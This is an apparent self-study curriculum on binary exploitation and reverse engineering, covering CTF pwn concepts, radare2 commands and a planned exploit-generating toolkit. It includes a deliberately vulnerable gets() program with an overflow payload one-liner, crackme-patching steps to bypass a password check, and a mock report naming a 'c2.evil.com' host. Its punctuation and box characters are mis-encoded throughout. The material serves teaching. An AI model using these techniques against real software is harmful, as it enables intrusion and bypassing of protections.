This project is about deliberate practice. CTF (Capture The Flag) pwn challenges are carefully designed to teach specific exploitation techniques in a safe, legal environment. Unlike real-world vulnerabilities (which are rare and unpredictable), CTF challenges provide concentrated, progressive skill-building opportunities. Youโ€™ll develop the muscle memory and intuition that separates hobbyists from professional exploit developers.

Concepts You Must Understand First

  1. Stack-Based Buffer Overflows
    • The classic: writing past the end of a stack buffer to overwrite return addresses
    • Stack layout: local variables, saved frame pointer, return address, function arguments
    • Exploitation: overwrite return address to redirect execution

    Guiding Questions:

    • Whatโ€™s the exact memory layout of a stack frame on x86-64?
    • How much offset do you need to reach the return address?
    • Whatโ€™s the difference between x86 (32-bit) and x86-64 (64-bit) exploitation?

    Book References:

    • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Ch 0x300: Exploitation
    • โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron - Ch 3.7: Procedures (stack frame details)
  2. Return-Oriented Programming (ROP)
    • When DEP/NX prevents shellcode execution, chain existing code fragments (gadgets)
    • Gadget: short instruction sequence ending in ret
    • ROP chain: sequence of addresses that performs desired operations

    Guiding Questions:

    • Why does ROP bypass DEP/NX?
    • How do you find gadgets in a binary?
    • Whatโ€™s the minimum set of gadgets needed for arbitrary code execution?

    Book References:

    • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Ch 0x300 (advanced exploitation)
    • โ€œThe Shellcoderโ€™s Handbookโ€ - Ch on ROP techniques
  3. Format String Vulnerabilities
    • printf(user_input) allows reading/writing arbitrary memory
    • %x reads stack, %n writes to addresses, %s dereferences pointers
    • Exploitation: leak addresses, overwrite GOT entries, arbitrary write

    Guiding Questions:

    • How does %n write to memory in printf?
    • How do you calculate the offset to your format string on the stack?
    • Why are format strings more powerful than buffer overflows?

    Book References:

    • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Ch 0x300: Format strings
    • โ€œThe Shellcoderโ€™s Handbookโ€ - Format string chapter
  4. Memory Protections (ASLR, DEP, Stack Canaries, PIE)
    • ASLR: randomizes addresses, defeats hardcoded exploits
    • DEP/NX: prevents code execution on stack/heap
    • Stack canaries: detect buffer overflows before return
    • PIE: code section also randomized

    Guiding Questions:

    • How do you bypass ASLR? (information leak + relative addressing)
    • What happens when a canary is overwritten?
    • Can you bypass all protections simultaneously?

    Book References:

    • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Ch 1: Security mechanisms
    • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Ch 0x500: Shellcode
  5. Heap Exploitation Basics
    • Heap allocators (malloc/free) have exploitable metadata
    • Use-after-free: accessing freed memory
    • Double-free: freeing same pointer twice
    • Heap overflow: overwriting heap metadata

    Guiding Questions:

    • How does malloc/free work internally?
    • What is a heap chunk header?
    • Whatโ€™s the difference between fastbin, smallbin, largebin?

    Book References:

    • โ€œThe Shellcoderโ€™s Handbookโ€ - Heap exploitation chapters
    • Research papers on heap exploitation techniques
  6. Pwntools and Exploit Development Workflow
    • Pwntools: Python library for exploit development
    • Workflow: analyze binary โ†’ find vulnerability โ†’ develop exploit โ†’ test locally โ†’ remote exploitation
    • Automation: template scripts, reusable patterns

    Guiding Questions:

    • How do you interact with remote services in pwntools?
    • Whatโ€™s the benefit of Python for exploit development?
    • How do you debug exploits that work locally but fail remotely?

    Book References:

    • Pwntools documentation
    • โ€œCTF Field Guideโ€ (Trail of Bits)

Questions to Guide Your Design

  1. Which platform to start? pwnable.kr (beginner), ROP Emporium (ROP focus), or picoCTF (educational)?

  2. Systematic vs opportunistic learning? Follow structured curriculum or jump to interesting challenges?

  3. Template library strategy? Create reusable exploit patterns or write from scratch each time?

  4. How do you document solutions? Writeups for each challenge? Annotated exploit code?

  5. Local vs remote testing? Set up Docker containers locally or test directly on remote services?

  6. Tool choices? GDB with pwndbg/gef, radare2, or IDA for analysis?

  7. Collaboration approach? Solo learning or team/community collaboration?

  8. How do you handle getting stuck? Time-box before looking at hints/writeups?

Thinking Exercise

Before coding exploits, complete this analysis exercise:

  1. Analyze this vulnerable code:
    #include <stdio.h>
    #include <stdlib.h>
    
    void win() {
        system("/bin/sh");
    }
    
    void vuln() {
        char buffer[64];
        gets(buffer);  // Vulnerable!
    }
    
    int main() {
        vuln();
        return 0;
    }
    
  2. Manual exploitation steps:
    • Compile with gcc -o vuln vuln.c -fno-stack-protector -no-pie
    • Disassemble and find win() address
    • Calculate offset from buffer to return address
    • Craft payload: padding + win_address
    • Test locally: python -c 'print("A"*72 + "ABCD")' | ./vuln
  3. Document:
    • Vulnerability type: Stack buffer overflow
    • Protections disabled: No canary, no PIE
    • Win condition: Call win() function
    • Exploitation technique: Overwrite return address
    • Payload structure: [padding][win_address]

The Interview Questions Theyโ€™ll Ask

  1. โ€œWalk me through exploiting a basic stack buffer overflow.โ€
    • Find overflow, calculate offset to return address, overwrite with target address (shellcode or win function).
  2. โ€œWhatโ€™s the difference between exploiting 32-bit vs 64-bit binaries?โ€
    • x86: args on stack. x86-64: args in registers (rdi, rsi, rdxโ€ฆ). Pointers 8 bytes vs 4. Different calling conventions.
  3. โ€œExplain Return-Oriented Programming.โ€
    • Chain gadgets (code ending in ret) to perform operations when NX prevents shellcode. Each gadget address on stack acts as return address.
  4. โ€œHow do you bypass ASLR?โ€
    • Leak an address (format string, buffer over-read), calculate base from leak, use relative offsets.
  5. โ€œWhatโ€™s a format string vulnerability and why is it powerful?โ€
    • printf(user_input) allows reading stack (%x) and writing memory (%n). Can leak addresses and modify GOT/function pointers.
  6. โ€œExplain stack canaries. How do you bypass them?โ€
    • Random value placed before return address. Checked on return. Bypass: leak canary value, preserve it in overflow.
  7. โ€œWhatโ€™s a GOT overwrite and when is it useful?โ€
    • Global Offset Table holds addresses of library functions. Overwrite entry to hijack function calls. Useful when you canโ€™t directly control execution.
  8. โ€œDescribe a use-after-free vulnerability.โ€
    • Accessing freed memory. Allocate new object in same location, old pointer now references new object. Type confusion or data leak.
  9. โ€œWhat tools do you use for binary exploitation?โ€
    • pwntools (exploit development), GDB with pwndbg/gef (debugging), ROPgadget/ropper (gadget finding), checksec (protection checking).
  10. โ€œWhatโ€™s your methodology for approaching a new CTF pwn challenge?โ€
    • Check protections โ†’ run binary โ†’ analyze in debugger โ†’ identify vulnerability โ†’ develop exploit locally โ†’ adapt for remote.

Books That Will Help

Topic Book Chapters
Exploitation Fundamentals โ€œHacking: The Art of Exploitationโ€ by Jon Erickson Ch 0x300: Exploitation
Ch 0x500: Shellcode
System Internals โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch 3: Machine-Level Representation
Ch 7: Linking
Binary Analysis โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch 1: Anatomy of a Binary
Ch 6: Binary Analysis Fundamentals
Assembly Language โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch 4-5: Assembly and Control Flow
Advanced Exploitation โ€œThe Shellcoderโ€™s Handbookโ€ ROP, Format Strings, Heap Exploitation chapters
Practical Guides โ€œCTF Field Guideโ€ (Trail of Bits) Available online
CTF Walkthroughs โ€œNightmareโ€ (guyinatuxedo) Comprehensive CTF solutions - available on GitHub

Project 17: radare2 Mastery

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: r2 commands, r2pipe (Python)
  • Alternative Programming Languages: JavaScript (r2js)
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Static Analysis / Command Line RE
  • Software or Tool: radare2, Cutter (GUI)
  • Main Book: โ€œThe radare2 Bookโ€

What youโ€™ll build: Complete analysis of binaries using only radare2โ€™s command-line interface, plus automation with r2pipe.

Why it teaches binary analysis: radare2 is the most powerful open-source RE framework. Its CLI forces you to think about what youโ€™re doing.

Core challenges youโ€™ll face:

  • Command syntax โ†’ maps to steep learning curve
  • Navigation โ†’ maps to moving through binaries
  • Visual mode โ†’ maps to interactive disassembly
  • Scripting โ†’ maps to r2pipe automation

Resources for key challenges:

Key Concepts:

  • Command Structure: radare2 book
  • Visual Mode: V and VV commands
  • r2pipe: Python bindings documentation

Difficulty: Intermediate Time estimate: 2-3 weeks Prerequisites: Projects 1-4

Real world outcome:

$ r2 ./crackme
[0x00401040]> aaa               # Analyze all
[0x00401040]> afl               # List functions
0x00401040    1 43           entry0
0x00401170    4 101          main
0x004011e0    3 67           sym.check_password

[0x00401040]> s main            # Seek to main
[0x00401170]> pdf               # Print disassembly function
            ; CODE XREF from entry0
โ”Œ 101: int main (int argc, char **argv);
โ”‚           0x00401170      push rbp
โ”‚           0x00401171      mov rbp, rsp
โ”‚           0x00401174      sub rsp, 0x40
โ”‚           ...
โ”‚           0x004011a0      call sym.check_password
โ”‚       โ”Œโ”€< 0x004011a5      test eax, eax
โ”‚       โ”‚   0x004011a7      je 0x4011b8
โ”‚       โ”‚   0x004011a9      lea rdi, str.Correct
โ”‚       โ”‚   0x004011b0      call sym.imp.puts

[0x00401170]> VV                # Visual graph mode
[0x00401170]> s sym.check_password
[0x004011e0]> pdc               # Decompile (with r2ghidra)

int check_password(char *input) {
    return strcmp(input, "s3cr3t") == 0;
}

# r2pipe automation
$ python3
>>> import r2pipe
>>> r2 = r2pipe.open('./crackme')
>>> r2.cmd('aaa')
>>> functions = r2.cmdj('aflj')  # JSON output
>>> for f in functions:
...     print(f['name'], hex(f['offset']))

Implementation Hints:

Essential r2 commands:

# Analysis
aaa              # Analyze all
afl              # List functions
axt addr         # Xrefs to address
axf addr         # Xrefs from address
iz               # List strings
ii               # List imports

# Navigation
s addr           # Seek to address
s main           # Seek to function
sf               # Seek to next function
sb               # Seek to previous function

# Disassembly
pd 20            # Print 20 instructions
pdf              # Print function disassembly
pdc              # Pseudo-decompile (with plugins)
pdr              # Print function in raw bytes

# Visual mode
V                # Visual mode (press p to cycle views)
VV               # Visual graph mode
Vp               # Visual panel mode

# Debugging
db addr          # Set breakpoint
dc               # Continue
ds               # Step
dr               # Show registers
doo              # Reopen for debugging

# Patching
wa nop           # Write assembly (nop)
wx 90            # Write hex bytes

Common workflows:

  1. aaa; afl - Analyze and list functions
  2. iz; iz~password - Find interesting strings
  3. axt str.password - Find references to string
  4. s ref; pdf - Go to reference, disassemble

Learning milestones:

  1. Basic navigation โ†’ Move around binaries
  2. Visual mode โ†’ Efficient analysis
  3. Find vulnerabilities โ†’ Locate interesting code
  4. Automate with r2pipe โ†’ Script your analysis

    The Core Question Youโ€™re Answering

How do you efficiently analyze and reverse engineer binaries using only a command-line interface, and why is mastering text-based tools essential for professional reverse engineering work?

This project challenges you to think beyond GUI tools and understand reverse engineering at a fundamental level. When you canโ€™t rely on visual cues and mouse clicks, youโ€™re forced to understand the underlying concepts, develop systematic workflows, and build automation that scales to hundreds of binaries.

Concepts You Must Understand First

1. Command-Line Philosophy and UNIX Composability

  • radare2 follows the UNIX philosophy: small, composable commands that do one thing well
  • Understanding why ~ (internal grep), | (pipe to shell), and @ (temporary seek) exist
  • The power of combining simple commands to create complex analysis workflows

Guiding Questions:

  • Why does radare2 use single-letter commands instead of descriptive names?
  • How does the command prefix system (a=analysis, p=print, d=debug) help organize functionality?
  • Whatโ€™s the advantage of pdf @ sym.main vs seeking to main first?

Book References:

  • โ€œThe radare2 Bookโ€ (online) - Chapter 1: Introduction, Chapter 4: Basic Usage
  • โ€œThe Art of UNIX Programmingโ€ by Eric S. Raymond - Chapter 1: Philosophy

2. Binary Analysis State and Context

  • Understanding the current seek position (like a cursor in your binary)
  • How radare2 maintains analysis state (function boundaries, cross-references, types)
  • The difference between ephemeral commands and persistent state changes

Guiding Questions:

  • Whatโ€™s the difference between s main and @ main in terms of state?
  • How does aaa (analyze all) build the function database, and when should you use aa vs aaa vs aaaa?
  • Why might you want to save a project (Ps) instead of re-analyzing each time?

Book References:

  • โ€œThe radare2 Bookโ€ - Chapter 4: Basic Usage (Seeking and Navigation)
  • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 5: Basic Binary Analysis

3. Visual Mode as Interactive Disassembly

  • Visual mode (V) isnโ€™t just pretty printingโ€”itโ€™s an interactive analysis workspace
  • Understanding the different visual panels (hex, disassembly, graph, debugging)
  • How visual mode keybindings map to command-line operations

Guiding Questions:

  • Whatโ€™s the relationship between pressing p in visual mode and the pd command?
  • How does VV (visual graph mode) help you understand control flow better than linear disassembly?
  • When would you use visual panel mode (V!) with multiple panes?

Book References:

  • โ€œThe radare2 Bookโ€ - Chapter 6: Visual Mode
  • โ€œReversing: Secrets of Reverse Engineeringโ€ by Eldad Eilam - Chapter 4: Reverse Engineering

4. Cross-References and Program Flow

  • Cross-references (xrefs) are the roadmap of your binaryโ€”who calls what
  • Understanding axt (xrefs to) vs axf (xrefs from) vs ax (list all)
  • How to trace data flow and control flow through xref analysis

Guiding Questions:

  • If you find an interesting string, how do you find all code that uses it?
  • How do you determine if a function is called from multiple places or just one?
  • Whatโ€™s the difference between code xrefs and data xrefs?

Book References:

  • โ€œThe radare2 Bookโ€ - Chapter 5: Analysis (Cross-References section)
  • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 6: Disassembly and Binary Analysis

5. r2pipe and Programmatic Analysis

  • r2pipe lets you control radare2 from any programming language
  • Understanding the JSON output mode (j suffix) for machine parsing
  • Building analysis pipelines that scale to multiple binaries

Guiding Questions:

  • Why would you use r2.cmdj('aflj') instead of parsing text output from afl?
  • How can you build a script that finds all functions using dangerous functions like strcpy?
  • Whatโ€™s the advantage of r2pipe over scraping radare2 text output?

Book References:

  • โ€œThe radare2 Bookโ€ - Chapter 15: r2pipe
  • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 12: Principles of Dynamic Analysis

6. Binary Patching and Modification

  • Understanding the difference between wa (write assembly), wx (write hex), and wao (write operation)
  • How to patch binaries in-place and save changes with wc (write cache)
  • The concept of reversible vs permanent patches

Guiding Questions:

  • How do you NOP out a conditional jump to bypass a check?
  • Whatโ€™s the difference between patching in-memory vs writing changes to disk?
  • How do you ensure your patch doesnโ€™t break relocations or other code?

Book References:

  • โ€œThe radare2 Bookโ€ - Chapter 8: Writing and Patching
  • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Chapter 5: Exploitation

7. Analysis Automation with r2 Scripts

  • r2 scripts (.r2 files) let you automate repetitive analysis tasks
  • Understanding how to combine commands with ; and create macros
  • Building reusable analysis workflows

Guiding Questions:

  • How do you create a script that automatically finds and patches anti-debugging checks?
  • Whatโ€™s the difference between running a script with . vs sourcing commands?
  • How can you make your analysis reproducible for team members?

Book References:

  • โ€œThe radare2 Bookโ€ - Chapter 14: Scripting
  • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 13: Binary Instrumentation

Questions to Guide Your Design

  1. Command Discovery: How will you learn and remember the hundreds of radare2 commands? Should you create personal cheat sheets, use ? help extensively, or build muscle memory through repetition?

  2. Workflow Efficiency: Whatโ€™s your standard workflow for analyzing a new binary? Do you start with aaa, then afl, then investigate interesting functions? Or do you prefer a different sequence?

  3. Visual vs Command-Line: When should you use visual mode vs staying in command-line mode? Is visual mode just for beginners, or does it offer unique insights?

  4. Scripting Strategy: Which analysis tasks should you automate with r2pipe vs do manually? At what point does scripting become more efficient than interactive analysis?

  5. Plugin Ecosystem: Should you rely on plugins like r2ghidra (decompiler) and r2dec, or stick to core radare2 functionality? How do plugins affect reproducibility?

  6. Collaborative Analysis: How do you share your radare2 analysis with team members? Do you save projects, export commands, or create scripts?

  7. Integration with Other Tools: How should radare2 fit into your overall RE workflow? Should it complement Ghidra/IDA, or can it be your primary tool?

  8. Learning Curve Management: radare2 is notoriously difficult to learn. How will you structure your learning to avoid frustrationโ€”start with small binaries, follow tutorials, or dive into complex samples?

Thinking Exercise

Exercise 1: Manual Command Reconstruction Before using visual mode, analyze a simple crackme using only command-line mode:

  1. Open the binary: r2 ./crackme
  2. Run analysis: aaa
  3. List functions: afl - identify main and other interesting functions
  4. Seek to main: s main
  5. Print disassembly: pdf
  6. Find string references: iz then axt str.password
  7. Navigate to the xref: s [address]
  8. Trace the check logic without using visual mode

Reflection: Which commands did you use most? What was frustrating? How would you optimize this workflow?

Exercise 2: Visual Mode Mapping In visual mode, press different keys and observe what happens:

  1. Enter visual mode: V
  2. Press p repeatedly - note each view (hex, disasm, debug, words, etc.)
  3. Press ? - study the help screen
  4. In graph mode (VV), navigate with hjkl and tab through nodes
  5. Return to command mode with q, then recreate one visual operation using CLI commands

Reflection: Which visual mode do you prefer? Can you recreate visual graph mode insights using pdf and agf?

Exercise 3: r2pipe Automation Planning Manually perform this analysis, then plan how to automate it:

Task: Find all functions that call dangerous functions (strcpy, gets, sprintf)

Manual steps:

r2 ./binary
aaa
afl
s sym.imp.strcpy
axt
# repeat for each dangerous function

Automation plan:

  • What JSON commands will you need? (aflj, axtj)
  • How will you iterate through dangerous functions?
  • What output format will be most useful?
  • Write pseudocode before writing Python

Exercise 4: Binary Patching Practice Find a simple crackme with a password check and practice patching:

  1. Locate the comparison: look for cmp or test before a conditional jump
  2. Understand the logic: does it jump if correct or if incorrect?
  3. Plan your patch: should you NOP the jump, change the condition, or modify the comparison?
  4. Apply the patch: use wa or wx
  5. Verify in-memory: use pd to see your changes
  6. Test: run with ood (open in debug mode)
  7. Save permanently: use wc [filename] (write changes)

Reflection: Did your first patch work? What did you learn about instruction lengths and side effects?

The Interview Questions Theyโ€™ll Ask

Technical Understanding:

  1. Q: Explain the difference between aa, aaa, and aaaa in radare2. When would you use each? A: They perform progressively deeper analysis: aa does basic analysis (functions, xrefs), aaa adds deeper analysis including strings and function arguments, aaaa is even more aggressive. Use aa for quick checks, aaa for normal analysis, and aaaa when comprehensive analysis is needed.

  2. Q: How would you find all calls to strcpy in a binary using radare2? A: Run aaa to analyze, afl~strcpy to check if itโ€™s imported, s sym.imp.strcpy to seek to it, then axt to find all cross-references (calls) to strcpy. Or use r2pipe: r2.cmdj('axtj @ sym.imp.strcpy') for JSON output.

  3. Q: Whatโ€™s the purpose of the @ operator in radare2 commands? A: The @ operator performs a temporary seek. For example, pdf @ sym.main prints the disassembly of main without changing your current seek position. Itโ€™s essential for scripting and avoiding state changes.

  4. Q: How do you patch a binary in radare2 and save the changes permanently? A: Use wa (write assembly) or wx (write hex bytes) to modify in memory, then wc [filename] to write changes to a new file. You can also use oo+ (open in write mode) to modify the original.

  5. Q: Explain the different visual modes in radare2 and when youโ€™d use each. A: V enters visual hex/disassembly (press p to cycle views), VV shows the graph view (control flow), V! enters panel mode (multiple panes). Use hex view for raw bytes, disassembly for linear code, graph for understanding flow, and panels for debugging.

Practical Application:

  1. Q: Youโ€™re analyzing a stripped binary with no symbols. How would you find the main function in radare2? A: Run aaa, then s entry0 to go to the entry point, pdf to see the code, look for the call to __libc_start_main which takes main as the first argument (in RDI on x64). Use the disassembly to trace the argument.

  2. Q: How would you use r2pipe to automatically analyze 100 binaries and find which ones have NX disabled? A: Write a Python script that opens each binary with r2pipe.open(), runs iI (binary info), parses the JSON output with cmdj('iIj'), checks the nx field, and logs results.

  3. Q: A binary crashes when you run it. How do you use radare2 to investigate without executing it? A: Open without execution: r2 ./binary (not r2 -d), run aaa for static analysis, find likely crash points (maybe invalid instruction or null pointer dereference), use pdf to understand context. For dynamic analysis, use doo (reopen in debug mode) and set breakpoints before the crash.

Tool Comparison:

  1. Q: When would you choose radare2 over Ghidra or IDA Pro? A: radare2 excels in: automation via r2pipe, command-line environments (servers, CTFs), binary patching, custom analysis scripts, and open-source requirements. Ghidra is better for decompilation and collaborative projects. IDA has better disassembly quality and commercial support.

  2. Q: How do you use radare2โ€™s JSON output mode, and why is it important? A: Append j to most commands: aflj (functions as JSON), iIj (binary info), axtj (xrefs). This is crucial for r2pipe scripting because parsing JSON is reliable, while parsing text output is fragile.

Books That Will Help

Topic Book Chapters Why It Helps
radare2 Fundamentals โ€œThe radare2 Bookโ€ (online) Ch 1-8: Introduction through Patching Official documentation, comprehensive command reference, essential for learning the tool
Command-Line Philosophy โ€œThe Art of UNIX Programmingโ€ by Eric S. Raymond Ch 1: Philosophy, Ch 11: Interfaces Understand why radare2 is designed the way it is - composable, text-based, scriptable
Binary Analysis Concepts โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch 5-6: Basic Binary Analysis, Disassembly Context for what youโ€™re analyzing - radare2 is the tool, this book explains the concepts
Disassembly Fundamentals โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch 3: Machine-Level Programming Understanding what youโ€™re seeing in pdf output - instruction encoding, calling conventions
Reverse Engineering Workflow โ€œReversing: Secrets of Reverse Engineeringโ€ by Eldad Eilam Ch 4-5: Reverse Engineering, Reversing Tools Learn systematic RE approaches that youโ€™ll implement in radare2
r2pipe Programming โ€œThe radare2 Bookโ€ Ch 15: r2pipe Learn to automate radare2 with Python, JavaScript, or other languages
Binary Patching โ€œHacking: The Art of Exploitationโ€ by Jon Erickson Ch 5: Exploitation (patching sections) Understand when and how to modify binaries using radare2โ€™s write commands
x86-64 Assembly โ€œLow-Level Programmingโ€ by Igor Zhirkov Ch 5-8: Assembly Programming Read disassembly fluently - understand what mov rdi, rsp means in context
Control Flow Analysis โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch 6: Binary Analysis (CFG section) Understand what VV graph mode is showing you - basic blocks, edges, loops
Dynamic Analysis Integration โ€œPractical Malware Analysisโ€ by Sikorski & Honig Ch 9: Dynamic Analysis Learn when to use radare2โ€™s debugger (ood, dc, ds) vs static analysis


Project 18: Complete Binary Analysis Toolkit

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: Rust, C
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 4. The โ€œOpen Coreโ€ Infrastructure
  • Difficulty: Level 5: Master
  • Knowledge Area: Tool Development / Complete Framework
  • Software or Tool: Your previous projects
  • Main Book: All previous books

What youโ€™ll build: A unified toolkit combining your ELF/PE parser, disassembler, analyzer, and exploit helpers into one professional tool.

Why it teaches binary analysis: Building professional tools requires integrating all your knowledge into a cohesive system.

Core challenges youโ€™ll face:

  • Clean architecture โ†’ maps to modular, extensible design
  • User experience โ†’ maps to helpful output, good CLI
  • Integration โ†’ maps to combining all components
  • Documentation โ†’ maps to making it usable

Time estimate: 2-3 months Prerequisites: All previous projects

Real world outcome:

$ binkit analyze ./suspicious
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘                    Binary Analysis Report                     โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘ File:     suspicious                                          โ•‘
โ•‘ Format:   ELF64                                               โ•‘
โ•‘ Arch:     x86-64                                              โ•‘
โ•‘ Compiler: GCC 11.2.0                                          โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘                       Security                                โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘ RELRO:        Full RELRO     โœ“                               โ•‘
โ•‘ Stack Canary: Found          โœ“                               โ•‘
โ•‘ NX:           Enabled        โœ“                               โ•‘
โ•‘ PIE:          Enabled        โœ“                               โ•‘
โ•‘ Fortify:      Enabled        โœ“                               โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘                    Vulnerabilities                            โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘ โš  gets() called at 0x401234 - Buffer overflow risk           โ•‘
โ•‘ โš  strcpy() called at 0x401456 - No bounds checking           โ•‘
โ•‘ โš  Format string at 0x401567 - printf(user_input)             โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘                    Interesting Strings                        โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘ 0x402000: "/bin/sh"                                           โ•‘
โ•‘ 0x402008: "http://c2.evil.com"                                โ•‘
โ•‘ 0x402020: "password123"                                       โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘                      Exploit Template                         โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘ Generated: exploit_suspicious.py                              โ•‘
โ•‘ Target: gets() overflow at 0x401234                          โ•‘
โ•‘ Strategy: ROP chain to system("/bin/sh")                     โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

$ binkit disasm 0x401234 20
0x00401234: 48 89 e7              mov rdi, rsp
0x00401237: e8 c4 fe ff ff        call 0x401100 <gets@plt>
0x0040123c: 48 85 c0              test rax, rax
...

$ binkit exploit ./suspicious --output pwn.py
[*] Generating exploit template...
[*] Found gets() vulnerability at 0x401234
[*] ROP gadgets found: 15
[*] Exploit written to pwn.py
[*] Run with: python3 pwn.py

Implementation Hints:

Architecture:

binkit/
โ”œโ”€โ”€ core/
โ”‚   โ”œโ”€โ”€ parser.py      # ELF/PE parsing (Project 1-2)
โ”‚   โ”œโ”€โ”€ disasm.py      # Disassembly (Project 3)
โ”‚   โ””โ”€โ”€ analyzer.py    # Vulnerability detection
โ”œโ”€โ”€ exploit/
โ”‚   โ”œโ”€โ”€ rop.py         # ROP chain builder
โ”‚   โ”œโ”€โ”€ shellcode.py   # Shellcode generation
โ”‚   โ””โ”€โ”€ templates/     # Exploit templates
โ”œโ”€โ”€ output/
โ”‚   โ”œโ”€โ”€ console.py     # Pretty printing
โ”‚   โ””โ”€โ”€ report.py      # Report generation
โ””โ”€โ”€ cli.py             # Command-line interface

Features to implement:

  1. Auto-detect file format
  2. Security check (like checksec)
  3. Vulnerability scanning
  4. ROP gadget finder
  5. Exploit template generator
  6. Report generation

Learning milestones:

  1. Integrate parsers โ†’ Support ELF and PE
  2. Add analysis โ†’ Vulnerability detection
  3. Build CLI โ†’ User-friendly interface
  4. Generate exploits โ†’ Automated template creation

    The Core Question Youโ€™re Answering

How do you architect a comprehensive binary analysis framework that integrates parsing, disassembly, vulnerability detection, and exploit generation into a cohesive, professional tool?

